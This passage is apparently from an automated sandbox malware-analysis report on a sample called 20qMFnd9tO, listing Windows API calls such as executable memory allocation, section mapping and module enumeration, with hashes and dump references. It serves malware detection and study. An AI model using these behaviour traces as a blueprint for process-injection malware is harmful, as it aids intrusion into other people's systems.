                                              • Opcode Fuzzy Hash: 97d47b0abb8866480f44754dc735a4b115dcf3b84d48fbb1c07c0b21aa749e4a
                                              • Instruction Fuzzy Hash: 6C327C70104B929AE725CF34C594BE3BBE1BF16309F84496DD0FB8B282D7B9604ACB55
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • GetComputerNameExA.KERNELBASE(00000006,?,00000200), ref: 00422B1D
                                              • GetComputerNameExA.KERNELBASE(00000005,00000000,00000200), ref: 00422C3A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID: ComputerName
                                              • String ID: ido1$kvri
                                              • API String ID: 3545744682-1372408504
                                              • Opcode ID: 8ce99b25c8e92c780c8398b980d499503a4318c2435ec1036843c074f629d874
                                              • Instruction ID: 9913d53f075df48d2ed55c36269c1905ce86d6754282f6a88588e489a2a79f56
                                              • Opcode Fuzzy Hash: 8ce99b25c8e92c780c8398b980d499503a4318c2435ec1036843c074f629d874
                                              • Instruction Fuzzy Hash: 57228B70204B529AD725CF34C594BE3BBE1BF16308F84496DD0FB8B282D7B9644ACB95
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,00000010,00003000,00000040), ref: 00436F65
                                              • NtFreeVirtualMemory.NTDLL(000000FF,?,00000000,00008000), ref: 00436FD7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID: ,$@
                                              • API String ID: 292159236-1227015840
                                              • Opcode ID: 53923adbfc6a9447e3dec5e387ccc6740b80307ad046d8bf83a3d17f7ae25900
                                              • Instruction ID: a03adac2527827931d70b2d8102014d7bcc0190a79fe1e5a52ac9dc4f4ed79cd
                                              • Opcode Fuzzy Hash: 53923adbfc6a9447e3dec5e387ccc6740b80307ad046d8bf83a3d17f7ae25900
                                              • Instruction Fuzzy Hash: 0F419EB5108705AFD710DF14C845B5BB7E4FF89328F158A1DF5A89B2E0E3789908CB5A
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00000010,00003000,00000040), ref: 0041F07B
                                              • NtFreeVirtualMemory.NTDLL(000000FF,00000000,00000000,00008000), ref: 0041F0D2
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00000010,00003000,00000040), ref: 0041F191
                                              • NtFreeVirtualMemory.NTDLL(000000FF,?,00000010,00008000), ref: 0041F1E4
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID:
                                              • API String ID: 292159236-0
                                              • Opcode ID: 988d82ec1be1251bf1e19389caf0e615a9020e2a2eefa36418a8890b43a17d63
                                              • Instruction ID: e0a7e9d02992bacbfa89f012523281f6694a55907a4fe32b1b9819e25999660c
                                              • Opcode Fuzzy Hash: 988d82ec1be1251bf1e19389caf0e615a9020e2a2eefa36418a8890b43a17d63
                                              • Instruction Fuzzy Hash: 25D1E1B15083118FE710CF18C84075BBBE1EF85714F14892EF9A987391E3B9D849CB9A
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,00000010,00003000,00000040), ref: 00437765
                                              • NtFreeVirtualMemory.NTDLL(000000FF,?,00000000,00008000), ref: 004377C3
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,D2FF0000,00000000,?,00003000,00000040), ref: 0043788A
                                              • NtFreeVirtualMemory.NTDLL(000000FF,000000B8,00000000,00008000), ref: 004378E7
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID:
                                              • API String ID: 292159236-0
                                              • Opcode ID: 78e115569172ad7b1383508404512725b96c03b541836f3b22e10cdef29cebae
                                              • Instruction ID: a3998fc49f3a29dc41672aef55df02be8577918d35f6a965ab30e23c2c06a20e
                                              • Opcode Fuzzy Hash: 78e115569172ad7b1383508404512725b96c03b541836f3b22e10cdef29cebae
                                              • Instruction Fuzzy Hash: C3817DB15083119BD720CF18C880B1BBBE5FF88364F148A2DF9D99B3A4D7759905CB96
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,000000B8,00003000,00000040), ref: 00416CDF
                                              • NtFreeVirtualMemory.NTDLL(000000FF,?,?,00008000), ref: 00416D29
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,000000B8,00003000,00000040), ref: 00416DCF
                                              • NtFreeVirtualMemory.NTDLL(000000FF,5C3924FC,?,00008000), ref: 00416E19
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID:
                                              • API String ID: 292159236-0
                                              • Opcode ID: 1f5346bfd5473f7189cceb156e0dfdd0080e9732f7f8fff6eb63901ab5151a48
                                              • Instruction ID: 4d9873f1e8f3d9a4bd9b21028fb075ddc7448c9c55893d116057c94cd1fa03ba
                                              • Opcode Fuzzy Hash: 1f5346bfd5473f7189cceb156e0dfdd0080e9732f7f8fff6eb63901ab5151a48
                                              • Instruction Fuzzy Hash: CA4159B51087409FE700CF14C844B5EB7E8FB88318F544A2CF6A99B3A0D778D908CB9A
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: )$IDAT$IEND$IHDR
                                              • API String ID: 0-3181356877
                                              • Opcode ID: fb630df48ca3033b79c02fb00a64a73d56955321e1a63e46bd51af0f576cf898
                                              • Instruction ID: d068175341bdd85addb62140043e081e60031e9b3d8bc5fa1852449108c15d4e
                                              • Opcode Fuzzy Hash: fb630df48ca3033b79c02fb00a64a73d56955321e1a63e46bd51af0f576cf898
                                              • Instruction Fuzzy Hash: 98120FB16083408FD718CF29D85076B7BE0EF85304F15866EEA869B3D2D779D909CB86
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,00000010,00003000,00000040), ref: 00437145
                                              • NtFreeVirtualMemory.NTDLL(000000FF,?,00000000,00008000), ref: 004371A2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID: @
                                              • API String ID: 292159236-2766056989
                                              • Opcode ID: 069b9fb449dddb6217d2742d095e2f69666d70c1a405a54f3b0178c2de4aff6e
                                              • Instruction ID: 3470ca7a32e557e73fc606eae0d4ee44461d9084059e7f1d5ad2a83f520c0dea
                                              • Opcode Fuzzy Hash: 069b9fb449dddb6217d2742d095e2f69666d70c1a405a54f3b0178c2de4aff6e
                                              • Instruction Fuzzy Hash: 9D415BB61087049FD710CF14C844B1BB7E4EF89368F559A1DF9A89B3A0E3799908CB97
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,00000010,00003000,00000040), ref: 00437655
                                              • NtFreeVirtualMemory.NTDLL(000000FF,0000BA00,00000000,00008000), ref: 004376A7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID: @
                                              • API String ID: 292159236-2766056989
                                              • Opcode ID: 2f6ba8cee97a2f9810962fc78690305e3b4e58b623afafa70e25634a7e200208
                                              • Instruction ID: 29f5291566ca971277157fc3e76b40e99f649943cb0cdb06902f21baea30c39a
                                              • Opcode Fuzzy Hash: 2f6ba8cee97a2f9810962fc78690305e3b4e58b623afafa70e25634a7e200208
                                              • Instruction Fuzzy Hash: 5B416DB65087109FD310CF14C844B1BBBE4FB89368F008A2DF9A9A7390D374D9088B97
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,00000010,00003000,00000040), ref: 004373A4
                                              • NtFreeVirtualMemory.NTDLL(000000FF,0000BA00,00000000,00008000), ref: 00437403
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID: $
                                              • API String ID: 292159236-3993045852
                                              • Opcode ID: c37c6b5c451b38d6ae7fb4e42b3a4e5df3548462c2cec44560233b9523c4bb9e
                                              • Instruction ID: 72b04062a4941d8a1ae90bf3d94f17069bde73a1860f2a023997d650316118d9
                                              • Opcode Fuzzy Hash: c37c6b5c451b38d6ae7fb4e42b3a4e5df3548462c2cec44560233b9523c4bb9e
                                              • Instruction Fuzzy Hash: 36315C75208315AFE720CF14DC40B1FB7E8EB89718F10492DFAA49B390D7759808CB96
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,00000010,00003000,00000040), ref: 00419CA1
                                              • NtFreeVirtualMemory.NTDLL(000000FF,0000BA00,00000000,00008000), ref: 00419D08
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID: ,
                                              • API String ID: 292159236-3772416878
                                              • Opcode ID: 0611d15885a3dbbd9c50aa940e03470727d33db14537f0f80ce13edc545bdf30
                                              • Instruction ID: 224a45add27236ffddbcf91f67d44791d7106cbfd86a407639e738a615638124
                                              • Opcode Fuzzy Hash: 0611d15885a3dbbd9c50aa940e03470727d33db14537f0f80ce13edc545bdf30
                                              • Instruction Fuzzy Hash: FC314975208304AFD710CF14DC44B5BBBE9FB89358F148A1DFAA49B390D37598488B96
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,00000010,00003000,00000040), ref: 0041A169
                                              • NtFreeVirtualMemory.NTDLL(000000FF,?,00000000,00008000), ref: 0041A1B2
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID:
                                              • API String ID: 292159236-0
                                              • Opcode ID: 8928fae6beade2dcf9baa94eb3010de6f2032e7895fe792f899fcc72ab3f042e
                                              • Instruction ID: 4851f86f5c969aab153c4d67b6d620e1987cc244d1a234b01088b41b61ddc7f2
                                              • Opcode Fuzzy Hash: 8928fae6beade2dcf9baa94eb3010de6f2032e7895fe792f899fcc72ab3f042e
                                              • Instruction Fuzzy Hash: 27A1ECB15083119BDB10DF14C852BABB7E4EF85324F08492EF8959B391E378D945CB9A
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00000010,00003000,00000040), ref: 004382CC
                                              • NtFreeVirtualMemory.NTDLL(000000FF,?,00000000,00008000), ref: 0043832D
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID:
                                              • API String ID: 292159236-0
                                              • Opcode ID: daa727d99653e8d7c216daf804cbd031a68e093b3bac86a89d72c7eca767e75d
                                              • Instruction ID: 0e20978d530c16e9394b08b5acea62e704e446e4b6a71f5478531374b9695d52
                                              • Opcode Fuzzy Hash: daa727d99653e8d7c216daf804cbd031a68e093b3bac86a89d72c7eca767e75d
                                              • Instruction Fuzzy Hash: CD81D2755083519FC311CF24C880A2BFBE1BBD9318F598A2DF89987392D774D909CB96
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2946a785a7335dce04309b2b89095e2828e62c30e1c85b38bab3a1f00ec962b8
                                              • Instruction ID: 46af719f9938c400c64fdf70310ab0e8678324bcb73df77baa7b064a5f7593ae
                                              • Opcode Fuzzy Hash: 2946a785a7335dce04309b2b89095e2828e62c30e1c85b38bab3a1f00ec962b8
                                              • Instruction Fuzzy Hash: 3951B075244B518FD725CF24C814BA2BBF0FF06309F58496DD1EACB292DB79A809CB54
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,00000010,00003000,00000040), ref: 00437265
                                              • NtFreeVirtualMemory.NTDLL(000000FF,0000BA00,00000000,00008000), ref: 004372BD
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID:
                                              • API String ID: 292159236-0
                                              • Opcode ID: 8658342b72303bdb5dcf044743d588e8f186c13abbcc6335f68c62d6f4af87bf
                                              • Instruction ID: bb41111ea903b26384c474b20ffe10ba7d5028a5dfc9cf92b9ddedf0ce607f6b
                                              • Opcode Fuzzy Hash: 8658342b72303bdb5dcf044743d588e8f186c13abbcc6335f68c62d6f4af87bf
                                              • Instruction Fuzzy Hash: 9A315CB5508715AFEB10CF14C844B5FBBE8EB89324F048A2DF9A4973D1D7B49908CB96
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,00000010,00003000,00000040), ref: 0041675C
                                              • NtFreeVirtualMemory.NTDLL(000000FF,?,?,00008000), ref: 004167B1
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID:
                                              • API String ID: 292159236-0
                                              • Opcode ID: 4d1564886dd15fbc451907a0650df2c02c7b50044f79724ef898f624542a511d
                                              • Instruction ID: 306ac6667e010ce3ca95cf983226b12161baf105d0fbc4103a341dece360a5dc
                                              • Opcode Fuzzy Hash: 4d1564886dd15fbc451907a0650df2c02c7b50044f79724ef898f624542a511d
                                              • Instruction Fuzzy Hash: 74318B756187408FD714CF14C840B5BB7E4BB88318F154A2DF9A59B3A1D774D8048B8A
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,00000010,00003000,00000040), ref: 0043851F
                                              • NtFreeVirtualMemory.NTDLL(000000FF,?,00000000,00008000), ref: 00438575
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID:
                                              • API String ID: 292159236-0
                                              • Opcode ID: a36230d6e06b83005856d3deb3cb5c7e6891ac8839eccad9719101de5b405186
                                              • Instruction ID: 210a02fd3ac3a9c7de4a2c9f03c2dee55871b0ac6ad3cca68037809ea3fb048c
                                              • Opcode Fuzzy Hash: a36230d6e06b83005856d3deb3cb5c7e6891ac8839eccad9719101de5b405186
                                              • Instruction Fuzzy Hash: FA317C71108705AFD710DF18DC40B1FBBE5EB89368F118A2DF9A49B3A0D77598098B97
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,?,00003000,00000040), ref: 00415BF1
                                              • NtFreeVirtualMemory.NTDLL(000000FF,?,?,00008000), ref: 00415C44
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID:
                                              • API String ID: 292159236-0
                                              • Opcode ID: f0a65c59f9e647ceb119464e9de520418e1774f71a95882de98c750e2f5e9c81
                                              • Instruction ID: cf38f5e4c694132fec633ddb84a0b2ff5bd7de55ce9f10e3111fc9438b58fcb2
                                              • Opcode Fuzzy Hash: f0a65c59f9e647ceb119464e9de520418e1774f71a95882de98c750e2f5e9c81
                                              • Instruction Fuzzy Hash: 1F316DB51087408FD724CF14C845B5BB7E4FB89308F104A2CE5AAD73A1D7749909CB5B
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,D2FF0000,00000000,?,00003000,00000040), ref: 00417988
                                              • NtFreeVirtualMemory.NTDLL(000000FF,000000B8,00000010,00008000), ref: 004179D1
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID:
                                              • API String ID: 292159236-0
                                              • Opcode ID: 7b9d282766e2b2d54702f9f5361e03e5fdb8608fc6d5e87ce09f3ec85eaf7a92
                                              • Instruction ID: cc94dc1d494e4ba193adf9cc73b63730f54cdbd5af62b70491121e09dbd35659
                                              • Opcode Fuzzy Hash: 7b9d282766e2b2d54702f9f5361e03e5fdb8608fc6d5e87ce09f3ec85eaf7a92
                                              • Instruction Fuzzy Hash: B72146B52187408FE714CF14C844B5FB7E8BB89318F14892DE6A5CB3A1DB789948CB96
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,00000010,00003000,00000040), ref: 004153A1
                                              • NtFreeVirtualMemory.NTDLL(000000FF,?,00000000,00008000), ref: 004153E5
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID:
                                              • API String ID: 292159236-0
                                              • Opcode ID: 7a99e40a18b15fb4f451b98af34db27f7cb69718761374f553ae4ff390797268
                                              • Instruction ID: e5406eb1a83feec3c8a703f7dd689946b4f1a946a6d1207d0dd454413abf4b9b
                                              • Opcode Fuzzy Hash: 7a99e40a18b15fb4f451b98af34db27f7cb69718761374f553ae4ff390797268
                                              • Instruction Fuzzy Hash: 48218E752087149FD710CF04C884B5FBBE8EB85368F108A2DF9A48B390D37498488B97
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00000010,00003000,00000040), ref: 00434588
                                              • NtFreeVirtualMemory.NTDLL(000000FF,00000010,00000010,00008000), ref: 004345D7
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID:
                                              • API String ID: 292159236-0
                                              • Opcode ID: 7b44a34a4d7dc7ce8f7daef14bb7ea40452adb0ee914cdd49307957870110eeb
                                              • Instruction ID: 2057b6f47b01386fa3a202dce32a123e9ae0d3f4901569fb8de3aaefe9a7e00a
                                              • Opcode Fuzzy Hash: 7b44a34a4d7dc7ce8f7daef14bb7ea40452adb0ee914cdd49307957870110eeb
                                              • Instruction Fuzzy Hash: 7A2148B51083059FE714CF44C854B1BBBE4FB85718F108A1DF6B59B2D0D7B8990C8B96
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 007E04EE
                                              • Module32First.KERNEL32(00000000,00000224), ref: 007E050E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814752389.00000000007DF000.00000040.00000020.00020000.00000000.sdmp, Offset: 007DF000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7df000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CreateFirstModule32SnapshotToolhelp32
                                              • String ID:
                                              • API String ID: 3833638111-0
                                              • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                              • Instruction ID: 8993c403a18c809c55db0270f07541d9c64b62babde036acd65db993c534ffba
                                              • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                              • Instruction Fuzzy Hash: E9F062312017556BD7203AB6988DF6F76E8BF4D725F100529E642D50C0DAB8ED868AA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • NtOpenSection.NTDLL(?,00000004,?), ref: 00433D3F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID: OpenSection
                                              • String ID:
                                              • API String ID: 1950954290-0
                                              • Opcode ID: a1b2d0c6f452ec355e3b7b26032b59bc7b4e9cdc8015fff17ebec047cd84e1d1
                                              • Instruction ID: 59f0636a04edb36526bc4193f572342f0fdef4a9ef69ea8737305f1d12902995
                                              • Opcode Fuzzy Hash: a1b2d0c6f452ec355e3b7b26032b59bc7b4e9cdc8015fff17ebec047cd84e1d1
                                              • Instruction Fuzzy Hash: DFE0E5F8504381BFCB08CF90EC42D367362ABD2B09F10D82CB55042251E6B1AA168F59
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,?,00000002,00000000,00000002), ref: 00434D4A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID: SectionView
                                              • String ID:
                                              • API String ID: 1323581903-0
                                              • Opcode ID: 1716d2300906b16e18785e5bd46e107ea2ec8003b4fb75253048da8650c948ce
                                              • Instruction ID: 9c132e3696f8a7cc1cfebb2d359e3e28ca7a10dda8dad0fc6a33583830de52bb
                                              • Opcode Fuzzy Hash: 1716d2300906b16e18785e5bd46e107ea2ec8003b4fb75253048da8650c948ce
                                              • Instruction Fuzzy Hash: 04F030703D83057AF6348B14CC47F6A76A9EB81F10F308719F7616A1E5D9E07D058B49
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b668a006b1dd2da7ebdc0528d306120034ec08e06254bd56c7603d938047c537
                                              • Instruction ID: 7ce05bbed2077e6719604dc693853943d83de30e027127b8426862b0925af4eb
                                              • Opcode Fuzzy Hash: b668a006b1dd2da7ebdc0528d306120034ec08e06254bd56c7603d938047c537
                                              • Instruction Fuzzy Hash: F8F074741193418FD320EF24C95479BBBE0AB89304F419A1DE5C9C7291DBB59554DF83
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph
                                              control_flow_graph 67 4275b6-4276d4 68 4276d6 67->68 69 42771d-427785 SysAllocString 67->69 70 4276d8-427719 68->70 71 42778f-4277bb 69->71 70->70 72 42771b 70->72 72->69
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
